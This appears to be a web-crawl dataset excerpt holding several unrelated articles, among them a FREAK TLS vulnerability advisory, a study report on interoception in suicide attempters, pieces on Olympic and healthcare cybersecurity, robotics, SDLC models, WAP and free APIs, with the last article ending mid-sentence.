text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
A newly discovered vulnerability in the SSL and TLS cryptographic protocols could allow attackers to intercept and decrypt communications between affected clients and servers. Dubbed the “FREAK” vulnerability, it facilitates man-in-the-middle (MITM) attacks against secure connections where the server accepts RSA_EXPORT cipher suites and the client either offers an RSA_EXPORT suite or uses an older, unpatched version of OpenSSL. Once the encryption is broken by the attackers, they could steal passwords and other personal information and potentially launch further attacks against the website.
FREAK was discovered by a team of security researchers, who estimated that servers supporting just under ten percent of the top 1 million Alexa-listed domains were vulnerable to attack. Among the vulnerable client types were many Android and Apple devices, a high number of embedded systems, and a range of software products.
The vulnerability lies in the fact that attackers who intercept the setting up of a secure connection between an affected server and client can force them to use “export-grade” encryption in their communications, a much weaker form of encryption than is usually used today.
Export-grade encryption is so called because of a US government policy dating from the 1990s which required cryptographic software intended for export to use 512-bit encryption or less, which was not as secure as encryption used in the domestic market. While the policy has long been abandoned, export grade encryption has continued to exist as a legacy feature in a number of SSL/TLS implementations.
Even in the late 1990s, 512-bit encryption was seen as relatively weak and, by today’s standards, it is exceptionally so and can usually be cracked within a matter of hours. The standard was long ago superseded by 1024-bit encryption, which in theory would require millions of computers working for years to crack. Despite this, 1024-bit encryption was recently phased out in favor of the far more secure 2048-bit encryption to provide even more headroom.
Advice for businesses
Web server owners are advised to disable support for export grade encryption in addition to checking that any other known insecure ciphers are also disabled. Further guidance is available here.
OpenSSL users are advised to upgrade to the latest version, OpenSSL 1.0.2, which was released on January 22 and contains a patch for the OpenSSL Man in the Middle Security Bypass Vulnerability (CVE-2015-0204).
Advice for consumers
Users of Google Android devices who are concerned about this issue are advised to use the Chrome web browser rather than the default Android browser. Google has issued a patch and users are advised to update as soon as it is made available on their device.
Users of Apple desktop and mobile devices who are concerned about this issue are advised not to use the Safari browser until a patch is issued, which is due to arrive next week. Alternative browsers such as Firefox or Chrome are not affected by the vulnerability.
Symantec has provided the following tool to verify whether or not a domain is vulnerable:
Update – March 6, 2015:
Microsoft has issued an advisory, warning that Secure Channel (also known as Schannel), the Windows implementation of SSL/TLS, is also vulnerable to FREAK attacks. Microsoft said that a security feature bypass vulnerability (CVE-2015-1637) in Schannel affects all supported releases of Windows. The vulnerability could allow an attacker to force the downgrading of the cipher suites used in an SSL/TLS connection on a Windows computer.
Users of Microsoft Windows who are concerned about this issue are advised to apply workarounds to disable the RSA export ciphers. Microsoft recommends for customers to use these workarounds to mitigate this vulnerability.
Symantec has released an Audit IPS signature (Audit: Weak Export Cipher Suite) to detect traffic from servers that accept export ciphers. As of now the signature is called “Web Attack: Weak Export Cipher Suite CVE-2015-00242” but it will be renamed to “Audit: Weak Export Cipher Suite” in the next IPS definitions release.
IPS Audit signatures are available in SEP 12.1 RU2 (released November 2012) and above. We recommend customers run our latest software version (SEP 12.1 RU5) as this contains further IPS Audit signature enhancements. SEP's IPS Audit Signatures do not block traffic, but empower SEP administrators to learn which endpoints in their network are connecting to websites using this vulnerability. The administrators can take action as they see fit (creating firewall rules, application and device Control policies, and so on).
Update – March 10, 2015:
Apple has issued a patch for iOS (8.2) and a patch for OS X (2015-002) that fixes the FREAK vulnerability. Users are advised to update and apply these patches to their Apple devices. | <urn:uuid:43355db4-758e-4575-8093-4f65b1f35383> | CC-MAIN-2022-40 | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=46265381-1b63-4be6-bad5-b81cac3f0ae2&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00318.warc.gz | en | 0.955767 | 1,017 | 2.625 | 3 |
People who have survived a suicide attempt are less sensitive to bodily signals related to their heart and breath, and have a higher tolerance for pain, suggest new findings published today in eLife.
Accurately predicting the risk of suicide in an individual is one of the greatest challenges encountered by clinicians.
By identifying physical characteristics that differentiate people who have attempted suicide from those who have not, the study paves the way for future research aimed at identifying biological indicators of suicide risk.
Our brain constantly monitors the status of bodily signals that we need to stay alive, such as our heartbeat, our breath and pain caused by tissue damage to our skin.
‘Interoception’ describes the way the nervous system tracks the internal state of the body, helping us to perceive potential or actual threats and to act accordingly.
“Unlike most organisms, some humans are able to counteract these survival instincts through the act of suicide,” explains lead author Danielle DeVille, a PhD student at the Laureate Institute for Brain Research, Tulsa, Oklahoma, US.
“While experts have strived for decades to understand and prevent these deaths, we still don’t know enough about the factors that contribute to suicidal behaviour.”
To address this gap, DeVille and her colleagues conducted the first study that looks at whether blunted interoception is associated with a history of suicide attempts in people with psychiatric disorders, including depression, anxiety and post-traumatic stress disorder.
Their study involved 34 participants with a history of suicide attempts in the last five years as compared to a matched psychiatric reference sample of 68 participants with no history of suicide attempts.
The team examined interoceptive processing in the participants using a panel of tasks. These include a breath-hold challenge, a cold-pressor test – where an individual immerses a hand in icy water and has their heart rate and skin conductance measured – and heartbeat perception.
The researchers found that those who had attempted suicide tolerated the breath-hold and cold-pressor challenges for significantly longer than those who had not.
Additionally, this group was less able to accurately perceive their heartbeat than non-attempters.
“We found that this ‘interoceptive numbing’ was linked to lower brain activity in the insular cortex, a region that closely tracks the internal state of the body,” explains senior author Sahib Khalsa, Director of Clinical Operations at the Laureate Institute for Brain Research.
“This numbing was not influenced by the presence a psychiatric disorder, by a history of having considered suicide, or by having taken psychiatric medications, and this suggests it was most closely linked to the act of attempting suicide.”
Khalsa adds that these findings come with a number of limitations, including the fact that the study did not fully examine whether a history of considering suicide, versus making an actual attempt, has an independent impact on interoception.
“It is also difficult to judge from our study whether the observed differences in interoception represent innate characteristics of the individuals involved, or whether they reflect an emerging response as they progressed from suicidal thinking to suicidal action,” he says.
Despite these limitations, the authors say their work reveals a possible role of interoceptive dysfunction in distinguishing individuals at risk of suicide.
It also lays the groundwork for further studies to determine whether measuring interoception in individuals can improve the ability to predict their suicide risk.
The insular cortex is a key hub in emotional processing with connectivity to the PFC, particularly VPFC, as well as mesial temporal structures .
The insula plays an important role in interoceptive awareness for positive and negative internal states , including emotional and other types of pain, and understanding and sharing of other people’s emotional states [95, 96].
Only in more recent studies has insula structure and function and related behavior been investigated for its role in STBs. For example, on a behavioral level, interoceptive deficits have been reported among SAs compared with individuals who only thought about or planned suicide among general psychiatric outpatient adults and predicted SI severity at 6-month follow-up in community adolescents .
Lower insula thickness was observed in adults in relation to SA in SZ and SI in MDD . Smaller insula volume was associated with higher attempt lethality and lower impulsivity in BPD [87, 99].
In contrast, larger insula volumes were reported in relation to attempt lethality in adults with BD . It is possible that the type of insula differences relate to specific characteristics of the high lethality attempters, since larger insula volumes were also found in association with higher lifetime history of aggression in BPD .
Some findings in the PFC noted above in MDD extended to the insula, including associations between baseline 5-HT1a binding potential with SI and lethality of future attempts within a 2-year follow-up period and of increased neuroinflammation (TPSO availability) .
SPECT research showed higher insula rCBF in adult SAs with MDD at rest and higher insula fMRI activation was found in adults with MDD or BD with psychotic features during a cognitive control task with insula activity related to higher intensity of SI .
Higher insula fMRI activation was also associated with lower subjective value of gain and loss in adult SAs with MDD . Lower activation in the posterior insula during social exclusion was found in adult SAs with MDD or BD, which was suggested to indicate a higher tolerance to pain via repeated exposure to painful and provocative experiences in subjects vulnerable to suicide .
Smaller insula volume has been associated with SAs and lower impulsivity in adults across various mental disorders, whilst, both smaller and larger insula volumes have been associated with higher attempt lethality.
fMRI studies found higher insular activation during reward processing and cognitive control in adult SAs with MDD, while lower insula activation was associated with a higher tolerance to social pain in adult SAs with MDD or BD.
Thus, there is preliminary evidence for an involvement of insular structural and functional alterations in SI and SAs. However, since very few studies have focussed on the insula and that both decreases and increases in insula alterations have been reported, more research is needed to elucidate the role of the insula in STBs.
Interestingly, immune challenges activate interoceptive brain pathways (including the insula), triggering alterations in mood and cognition, motivation, and neurovegetative processes .
Together with preliminary evidence of increased neuroinflammation in the insula related to SI, this suggests that the insula may be an important region for future studies of neuroinflammation and STBs. | <urn:uuid:82299ee9-c8ce-4b7f-a9c3-7bfb4fa39d1c> | CC-MAIN-2022-40 | https://debuglies.com/2020/04/08/suicide-survivors-have-a-lower-sensitivity-to-body-signals-due-to-low-brain-activity-in-the-insular-cortex/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00318.warc.gz | en | 0.954242 | 1,417 | 2.984375 | 3 |
The growing reliance on IT infrastructure has resulted in increased cybersecurity requirements to plan for and mitigate possible cyber-attacks. Chris Harris, Europe, the Middle East and Africa (EMEA) Technical Director at Thales UK, discusses the type of threats that may impact the Games.
Ever since the 2004 Athens Olympic Games, cybersecurity has been a growing concern for the host nations and the International Olympic Committee (IOC). The growing reliance on IT infrastructure has resulted in increased cybersecurity requirements to plan for and mitigate possible cyber-attacks.
Even though Tokyo 2020 will be held without spectators, after Japan declared a state of emergency following a surge in COVID-19 cases, the games still depend on a great variety of cutting-edge digital infrastructure such as an AI-enabled face-to-face live translation device, face-recognition tech and ZMP’s Robot Taxi, a driverless car.
The dependence of the Tokyo 2020 Olympics on technology highlights the potential risks if a system was infiltrated. Japan and the IOC must be able to trust in the companies behind the technology, and their technical know-how and digital infrastructure.
It comes therefore as no surprise that the IOC identified cybersecurity as a priority area and announced plans to heavily invest to provide the best cybersecure environment for the games. However, the IOC noted that it would not be disclosing the specific details of their cybersecurity plan due to the nature of the topic.
Cybersecurity threats to the Olympics are not without precedent. The 2018 Winter Olympics in Pyeongchang saw the highest level of attacks. Russian hackers carried out attacks on Olympic networks before the opening ceremony, which slowed down the entry of spectators and took Wi-Fi networks offline. They also tampered with portions of the broadcast.
Historically the focus was on physical security, but as audiences grow in this ever-more connected world, the potential to disrupt or use a global event, such as the Olympic Games, as a platform for malicious, radical or misinformation purposes means that cybersecurity has needed to move center-stage to ensure the events can continue without disruption. When you have countries from across the world coming together, groups are going to try to take the opportunity to enrich themselves through crime or embarrass the host nation on the international stage.
The risks are not very different to those which businesses usually face, but the lure of such a visible stage and high-profile target means that the scale and volume of these attacks will be magnified to levels way beyond what regular corporations would see. RAND Corporation has published research highlighting the types of threats that Tokyo faces, which include:
• Targeted attacks, aimed at high-profile Olympic assets, individuals or organizations.
• Distributed denial of service (DDoS) attacks against Tokyo 2020 infrastructure or associated networks.
• Ransomware attacks which could affect a wide range of devices, services and underlying infrastructure supporting the Tokyo 2020 Olympics.
• Cyber propaganda or misinformation to damage the reputation of individuals, sponsor organisations, or the host nation.
According to the same research, the most probable threat actors are foreign intelligence services, cyber-terrorists, cyber-criminals, hacktivists or disgruntled insiders and ticket scalpers.
Preparing for the gold medal
To address this level of threats, planning is essential. Japan has initiated its preparation for the Olympics since 2015, signing partnerships with international and national organisations and agencies. For example, it has partnered with the U.S Department of Homeland Security, NIST, and Israel’s electricity provider, to manage cybersecurity concerns to critical infrastructure during the Olympics. More importantly, all of Japan’s leading corporations supporting the Olympic Games have adapted the NIST Cybersecurity Framework to align their preparedness and reaction to the globally accepted framework.
It is also important to note that Japan hosted the 2019 Rugby World Cup, another huge international sports event which served as a dry run for Tokyo 2020. This was a golden opportunity for the country to set a milestone before the Olympics to test its readiness and incident response capabilities in advance.
Finally, a review of Japan’s cybersecurity strategy for Tokyo 2020 showed that the country has limited cybersecurity professionals with only 28% of IT professionals working in-house. To solve this problem, Japan trained 220 ‘ethical hackers’ in the hope of creating a more cybersecure Tokyo 2020. The same review concludes that even “if the event is held in 2021 and the pandemic still requires most of the operators to work remotely, it would be important to secure not only Tokyo 2020-related infrastructure such as electricity, transportation, and venues, but also their remote work IT environment.”
Cybersecurity is a marathon at sprint tempo
Encryption will play a larger-than-ever role in protecting the information critical to the successful and safe operation of the Games. Networks should be encrypted, so that any data captured is unreadable. Principles of Zero Trust need to be applied to ensure that people and devices within the internal network are authenticated and only granted access to the resources they need. It is not just perimeter defense which needs to be in place, but every server, ever data store, every IoT device tracking the movement of vehicles, shipments, or capturing video should be delivering encrypted information to trusted locations and only able to communicate with the servers and services that are essential for their operation.
Finally, as ransomware attacks are on the increase, it will be important to ensure that critical systems and networks are segregated and redundant, and to ensure that backups and process-level privilege controls are in place to try and limit the threat to core systems.
Your organisation may not be under the same pressure as the Tokyo 2020 cybersecurity team, but for more information on how to protect and control sensitive data, read more about Thales’ Data Protection and Access Management solutions. | <urn:uuid:fe3b9759-7100-42aa-bb0c-62d1cabf61b8> | CC-MAIN-2022-40 | https://www.intelligentcio.com/apac/2021/07/20/protecting-the-tokyo-games-from-cybercriminals/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00318.warc.gz | en | 0.94805 | 1,182 | 2.640625 | 3 |
Robots might be taking over sooner or later. Maybe not in the same way it happens in television and film, but that might be for the better. Robotics are usually portrayed as taking over in some outlandish way that we can’t seem to control. Instead, we are seeing different industries benefit from the advancement in robotic technology. Some of these industries may not be what you would expect to benefit from robotics. But the future of robotic technology looks bright, and so do the different industries that are applying this technology.
Much of these benefits that we are seeing from robotic technology are due to the application of artificial intelligence and machine learning. These terms are oftentimes used interchangeably, but there is a distinct difference between artificial intelligence and machine learning.
Artificial intelligence is the broader idea and application of machines carrying out assignments for humans in an “intelligent” way. Machine learning on the other hand is under the umbrella of artificial intelligence. It is an application of artificial intelligence with the model of allowing machines to learn and make decisions for themselves. Machine learning, once set up correctly, can be a self-sustaining decision-making machine.
One of the developments that have been instrumental in the advancement of artificial intelligence and machine learning is the artificial neural network. An artificial neural network is a computer system designed to work in the same manner as the human brain. It can be taught different things including recognizing images and classifying them in various ways. Artificial neural networks are vital in the way artificial intelligence and machine learning operate.
The advancements in robotics have made applying the technology quite intriguing for several different industries that may not seem like an obvious pairing. Nonetheless, robotics is showing to be significant for these industries. The first industry applying robotic technology is health care.
There are several different ways the healthcare industry is applying the use of robotics. It is being used for rehabilitation purposes, patient companionship, therapy, and even surgery. Currently, robotic technology isn’t being applied to completely take over the duties of health care workers. It’s being used to make their jobs easier.
The farming and agriculture industry is also taking advantage of robotic technology. Farmers have been using driverless GPS-guided tractors and harvesters to be more efficient. This can save both time and money while making farm work less laborious. More recently, there has been researching and testing of robotic technology for spraying, mowing, pruning, and weed removal. Furthermore, technological improvements in sensors are also being used to manage pests and crop disease. The current pandemic has exposed how susceptible our food supply is but utilizing advancements in technology can prevent future shortages in food.
While on the subject of food, the hospitality industry is another industry benefiting from robotics. Food preparation is very important for many different reasons. Food is what sustains us and gives us the nourishment and energy we need to do work in our perspective industries, and if not prepared properly, we run the risk of becoming sick. Food is something every industry, and more importantly, every person in the world has in common. Developments in robotic technology are making food preparation less work. There are several robotic chefs and even complete robotic kitchens that can prepare meals from start to finish. Not only can these prepare complete meals for you, saving time and energy, but they can also curate meals according to different diets and lifestyles.
Robotic technology is being implemented in manufacturing. One of the easiest ways to utilize the power of robotic technology is in helping manufacturing workers do tedious and repetitive tasks. So far, in manufacturing, robotic technology isn’t being used to take the place of human workers, but to help make their job easier. Advancements in technology have also made working with robotic machines safer. Sensors, cameras, and systems programmed to turn off in emergencies are making it safer.
The military has been using robotic technology for quite some time now. Artificially intelligent unmanned army drones are being used for surveillance and for supporting certain operations. It can be used to evaluate the danger in situations and give soldiers information. These artificial intelligent drones can be used to do certain tasks without putting human soldiers in danger. There have been moral questions regarding self-governing weapons using artificial intelligence, which will be long debated.
Data centers are also utilizing the power of robotic technology for security purposes. Security is one of the most important aspects of a data center’s operations, and the industry is looking to apply innovations in robotic technology to increase data center security.
There have been several data center security innovations recently. Biometric technology (facial recognition, fingerprint scanning, and retina scanning) are being used to identify the people entering restricted areas in the data center. Artificial intelligence is also being used to detect cybercriminals from breaching cybersecurity systems.
But one of the most intriguing innovations has been how data centers are utilizing robotic technology for security. A data center company called Switch is deploying autonomous robots as added security guards. Sentry is a security robot that has a 360-degree camera, sensors that can scan visitors, and are built to climb curbs and stairs. It can monitor the inside of a data center and the outside of the data center building as well. These robots are fully autonomous but can be controlled by humans as well.
Technological advancements in robotics are changing the way many different industries operate. Industries such as healthcare, farming, hospitality and food, manufacturing, military, and the data center industry are all finding ways to utilize the power of robotics. All of these industries are taking advantage of robotics making operations more efficient. Robotics isn’t looking to take jobs away from workers in these different industries, but instead, makes certain jobs less tedious and easier. The developments in robotic technologies are making the future of many different industries brighter than they were yesterday. | <urn:uuid:41403a27-5c26-4b63-9ef6-7c108d517810> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/industrial-robotics-use | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00518.warc.gz | en | 0.953094 | 1,175 | 3.453125 | 3 |
A Wireless Application Protocol (WAP) is an old standard that allowed early mobile phones to access the Internet through something called a WAP Gateway. The WAP Gateway identified the device that was connecting to the Internet and could format the content sent to the device to match the screen size and type in use. It was cumbersome, failed more often than it got the screen rendered correctly and is no longer in use.
This standard was created by four companies: Ericsson, Motorola, Nokia, and Unwired Planet (now Phone.com). This protocol has become obsolete as newer Cell Phones can access the Internet no differently than your desktop or laptop computer.
Source: CNSSI 4009
Related Reading: Argus Cyber Security Targets IFEC Hackers With New Software
Does an SMB need to be concerned with WAP?
No. WAP is an outdated technology that was largely controlled by your mobile carrier. Today, modern carriers are running on networks known as LTE and have launched their latest network interface to the Internet – something known as 5G. 5G promises lightning quick internet on par with the fastest broadband networks available today. | <urn:uuid:a683e221-24e1-4b65-bb57-d47d12f10fab> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/wireless-application-protocol-wap/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00518.warc.gz | en | 0.958759 | 231 | 2.9375 | 3 |
In Software Engineering, we chant the term of validation and verification a lot between the software team members. Actually, it is used across the software project phases and I think there is a misconception in understanding the two terminologies and when to use them.
What is the Waterfall Model (Waterfall Methodology)?
It is mostly known as the traditional software development process model, widely used until now, and the most popular SDLC model and the one you should avoid to use. Moreover, it was the first introduced presentation of the software lifecycle.
You can read this Wikipedia page to know the waterfall model history.
The Waterfall Model is a linear sequential flow. In which progress is seen as flowing steadily downwards (like a waterfall) through the phases of software implementation. This means that any phase in the development process begins only if the previous phase is complete. The waterfall approach does not define the process to go back to the previous phase to handle changes in requirement.
In this article, we will discuss the advantages and disadvantages of the waterfall, should we avoid it? when to use it? and the waterfall model pitfall, and why I see it as the father of the SDLC models.
Software development lifecycle models have different strategies and methodologies for the software development process and I wrote about the different types of development models, please review this article for more information, we also discussed how to select the most suitable model based on your project context.
Regardless, what model you have selected, these models are sharing mostly the same development phases with different arrangements, a more or a less phase. Furthermore, they can be implemented in an iterative and incremental model.
In this article, we will discuss the most common phases across all SDLC models. I will add other articles to discuss each phase in details 🙂 Read more
Software development life cycle (SDLC) is a series of phases that provide a common understanding of the software building process. How the software will be realized and developed from the business understanding and requirements elicitation phase to convert these business ideas and requirements into functions and features until its usage and operation to achieve the business needs. A good software engineer should have enough knowledge on how to choose the SDLC model based on the project context and the business requirements.
Therefore, it may be required to choose the right SDLC model according to the specific concerns and requirements of the project to ensure its success. I wrote another article on how to choose the right SDLC, you can follow this link for more information. Moreover, to learn more about Software Testing life cycles and SDLC phases you follow the links highlighted here.
In this article, we will explore the different types of SDLC models and the advantages and disadvantages of each one, and when to use them.Read more | <urn:uuid:205a1a38-c96d-4546-a143-60a9f6cfbed1> | CC-MAIN-2022-40 | https://melsatar.blog/tag/sdlc-steps/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00518.warc.gz | en | 0.935778 | 565 | 2.78125 | 3 |
What is Software Development?
Software development involves the process of creating applications and software programs by writing and maintaining the source code. It is about the complete process and the stages involved throughout the software development life cycle (SDLC).
The software development is a step by step process of inventing, specifying, coding, recording, testing and fixing bugs that is done to create and manage frameworks, software components or even to develop a complete application.
Advantages of Software Deployment Tools
- Eases the business processes with custom made software solutions by enhancing in-house operations and productivity of the organization.
- Helps in integration with Internet of Things. Ensures Connectivity with users’ devices and other physical appliances to ease users’ lives and improved business outcomes.
- Effective Management of Big Data – It provides capabilities to collate and understand big data through an effective and organized dashboard. It would help business enthusiasts to analyse a wide range of metrics and identify trends to set goals more effectively.
- Choose an experienced software development company when trying to adapt to new software infrastructure which creates an impact to making or breaking of the project.
- Deploying a tailor-made software can automate the processes involved in business and generate centralized management.
- Going by the modern mobile trend, applications that helps businesses connected to devices from remote while the users can access process from any device from anytime.
- Software is developed as per the client requirements with demands. The developer gets a clear understanding of the goals of the client before proposing a solution. When the proposed solution is capable to address the customer needs – only then there is success with the software development.
- The software Development involves a life cycle called the SDLC (Software Development Life Cycle). The different stages of SDLC is understanding the requirements, designing, planning, implementing, testing, documenting and maintaining. A software development when passed through each of the SDLC stages – there are high chances of delivering a good quality software.
- Software development assures to deliver a software on time. A software product loses its value when it is not delivered on time. When software is delivered on time it enhances the chances in Return on Investment
Best Deployment in Software Practices
Implement a deployment checklist
Set up a process while you deploy a new software. A checklist helps you to follow what must be done next so that you will not miss out any of the crucial steps
Choose the right Deployment Method
Implement the software that is easy to integrate with the existing local applications and other tools.
Automated Software Deployment Process
Deployment of new versions of software manually is a daunting task that brings in a lot of possibilities of human errors. Automating the deployment process, mitigates the possibilities of errors, increases the deployment speed and streamlines the process
Adopt continuous delivery
Adopting Continuous Delivery ensures to enable the code for the required deployment. This is done by implementing the application in a proto-type environment to ensure if the application is good to function and meet the demands once deployed.
Use a continuous integration server
Continuous Server Integration is crucial for any successful agile deployment. This ensures that the developed program works on a developer’s machine while the it helps you deny “integration hell”. | <urn:uuid:875f358b-2247-474d-b76c-a14196897984> | CC-MAIN-2022-40 | https://www.itarian.com/itcm-software-deployment.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00518.warc.gz | en | 0.900308 | 666 | 2.953125 | 3 |
Healthcare cybersecurity is a strategic imperative for any organization in the medical industry — from healthcare providers to insurers to pharmaceutical, biotechnology and medical device companies. It involves a variety of measures to protect organizations from external and internal cyber attacks and ensure availability of medical services, proper operation of medical systems and equipment, preservation of confidentiality and integrity of patient data, and compliance with industry regulations.
An Industry Under Attack
The healthcare industry has historically been a primary target of cyber attacks. As of January 7, 2022, the Office for Civil Rights of the U.S. Department of Health and Human Services (HHS) was investigating 860 data breaches reported in the preceding 24 months; each breach exposed protected health information (PHI) of 500 or more individuals. One hundred nineteen (or 13.8%) of these breaches involved “Business Associates”— vendors and other third parties who had access to sensitive patient data — with the largest breach affecting 3.25 million people. According to the 2021 Cost of a Data Breach Report by IBM and Ponemon Institute, the average cost of a healthcare breach was $9.23 million, more than twice the $4.24 million average for all industries.
Threat actors view healthcare organizations as attractive targets for at least three reasons:
- Healthcare organizations have an extensive and often unprotected attack surface. In addition to attack vectors common to all enterprises, healthcare organizations deal with a wide range of connected medical devices (Internet of Medical Things, IoMT), usage of personal endpoints that may lack adequate endpoint security at healthcare facilities (BYOD), and numerous third parties having access to sensitive patient data and critical assets in hospital settings. Further, the proliferation of home working and virtual doctor’s visits (telehealth) prompted by COVID-19 and the rapidly rolled out but not always properly secured supporting IT infrastructure have created even more opportunities for attackers.
- PHI data has high value on the black market. The value of PHI to threat actors is high, due to the richness of personal information that these records contain that can be used for identity theft, healthcare insurance fraud and other malicious activities. Therefore, each medical record can fetch hundreds of dollars on the black market — a lot more than a stolen credit card number, for example.
- Breaches cause material damage (hence, victims’ greater willingness to pay attackers to free themselves from ransomware). Disruption in the work of healthcare facilities and inaccessibility of patient data that may be required to perform critical procedures can, literally, cost lives. Plus, privacy regulations like HIPAA impose massive fines for PHI disclosure. Penalties for HIPAA violations related to “privacy, security, breach notification and electronic health care transactions” can reach $1.81 million per calendar year.
Types of Attacks
According to HHS Office of Information Security’s “2020: A Retrospective Look at Healthcare Cybersecurity,” ransomware attacks accounted for almost 50% of all healthcare data breaches. In 2021, threat actors extorted from healthcare organizations ransomware payments averaging $910,335, per BakerHostetler’s 2021 Data Security Incident Response Report.
In respect of specific attack types, the 2021 Verizon Data Breach Investigations Report states that 86% of covered healthcare breaches were caused by:
- Errors (including mis-delivery)
- Web application attacks
- System intrusions, including those involving credential theft
Cybersecurity Strategies and Regulations
To help healthcare organizations safeguard critical assets and data, government and industry bodies have published compliance mandates and recommendation frameworks, such as:
- General security and privacy:
- HHS and Healthcare and Public Sector Coordinating Councils’ “Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients” provides a “common set of voluntary, consensus-based, and industry-led guidelines, best practices, methodologies, procedures, and processes” to help healthcare organizations reduce cyber risk.
- The HIPAA Security Rule establishes national standards to protect individuals’ electronic personal health information (ePHI). The Security Rule mandates compliance with administrative, physical and technical safeguards to ensure ePHI’s confidentiality, integrity and security, including, among others, access control.
- NIST’s “HIPAA Security Rule Crosswalk to NIST Cybersecurity Framework” maps HIPAA Security Rule standards and implementation specifications to applicable NIST Cybersecurity Framework sub-categories.
- Protection from ransomware:
- HHS’s “Ransomware Fact Sheet” offers specific guidance for protection against ransomware and recovery — specifically in the context of HIPAA notification rules.
- CISA’s alert (AA21-131A) “DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks” provides mitigation recommendations to reduce ransomware risks, including:
- Requiring multi-factor authentication for remote access
- Enabling strong spam filters to prevent phishing emails from reaching end users
- Implementing a user training program and simulated spear phishing attacks
- Filtering network traffic
- Updating software, including operating systems, applications and firmware
- Limiting access to resources over networks, especially by restricting RDP
- Setting antivirus or antimalware programs to conduct regular scans
- Ensuring user and process accounts are limited through account use policies, user account control and privileged account management
- Preventing unauthorized execution by:
- Implementing application allowlisting and Software Restriction Policies (SRPs)
- Disabling macros in Microsoft Office attachments
- Monitoring or blocking inbound connections from anonymization services (Tor) and post-exploitation tools (Cobalt Strike).
The importance of Protecting Data with Access, Credential Management and Privilege Controls
All healthcare cybersecurity frameworks and regulations place great importance on safeguarding access. For example, the NIST Cybersecurity Framework includes Access Control (PR.AC) and Protective Technology (PR.PT) in its “Protect” pillar. NIST prescribes that “access to assets and associated facilities” must be “limited to authorized users, processes, or devices, and to authorized activities and transactions.” This includes the following requirements specific to digital access:
- AC-1: Identities and credentials are managed for authorized devices and users.
- AC-3: Remote access is managed.
- AC-4: Access permissions are managed, incorporating the principles of least privilege and separation of duties.
- PT-3: Incorporate the principle of least functionality by configuring systems to provide only essential capabilities. This is critical to limiting the area of attack and ensuring the least privilege principle.
Protecting access is foundational to implementing a Zero Trust model and the overall defense-in-depth strategy. So, 59% percent of health system CIOs surveyed by Black Book Market Research for their 2020 State of the Healthcare Industry Cybersecurity Report are shifting security strategies to address user authentication and access.
Some examples of specific measures to safeguard access and privilege include the following:
- Implementing adaptive multi-factor authentication and single sign-on to prevent incidents resulting from credential compromise
- Protecting access to privileged accounts to foil takeover attempts and prevent breaches
- Combining the following approaches to block unpermitted application access to sensitive data to prevent ransomware encryption:
- Application allowlisting to only allow programs explicitly permitted by security policy to execute
- Prohibiting applications (other than those specified by policy) from accessing sensitive data, even if they are allowed to run
- Removing local admin rights and enforcing least privilege on endpoints to prevent privilege escalation and restrict lateral or vertical movement
- Cataloging software and putting in place specific execution and operation policies
- Applying SRPs or other controls to prevent programs from executing from common ransomware locations
- Securing remote third-party access to reduce the risk of breaches arising from compromise of vendors, contractors, business partners and other external parties. | <urn:uuid:fbb963d7-f7c8-4e47-b343-cfe094d6f14c> | CC-MAIN-2022-40 | https://www.cyberark.com/what-is/healthcare-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00518.warc.gz | en | 0.902207 | 1,641 | 2.8125 | 3 |
With free APIs, developers can practice programming by using those APIs to create applications. Once you have practiced writing apps, you can then move on to paying for some APIs that you can use to write even more useful or complex apps.
Phone Number Validator
There is a multitude of free APIs that are available to the public. So, your options for the types of APIs you can practice with are almost endless. One such API you can use to build applications is a phone number validator API, which enables you to ensure telephone numbers are valid for hundreds of countries around the world. With a phone number validator API, you can also find the company associated with a number and its location.
The big Git hosts, like GitHub, Gitlab, and Bitbucket, all provide their own APIs to enable developers to automate tasks like pulling and pushing code and merging code. Authentication is provided via OAuth, so you can be sure the APIs are secure and authentic.
With APIs like Let’s Validate, you can discover what technologies are being used on other websites. You can use validation APIs to reveal the technologies that are of interest. And because there is no authentication required, you can begin using the data straight away.
APIs like the Postman API enable you to make requests easily. You can write programs to script the testing of APIs. You can also send query strings and headers, and get response headers and bodies. If you are building an application, APIs used for testing are essential.
Website and RSS Aggregator
With this type of free API, you can aggregate data from a multitude of websites and RSS feeds and put them all in one place. Website and RSS aggregator APIs support CORS, which means you can access data straight from frontend apps. The aggregated information is returned in JSON format, so you are able to use the data immediately. You can use it to crawl websites, and RSS feeds to extract whatever data you want.
Various free public APIs enable you to create your own dictionary application. Popular ones like Oxford Dictionary API and Merriam-Webster API are free as long as you limit your queries and sign up for an API key to access them. Dictionary APIs provide definitions of words and pronunciations. They often also include things like a word-translator and thesaurus. You can use sentences APIs to gain example sentences that contain given words, as well.
File Conversion APIs
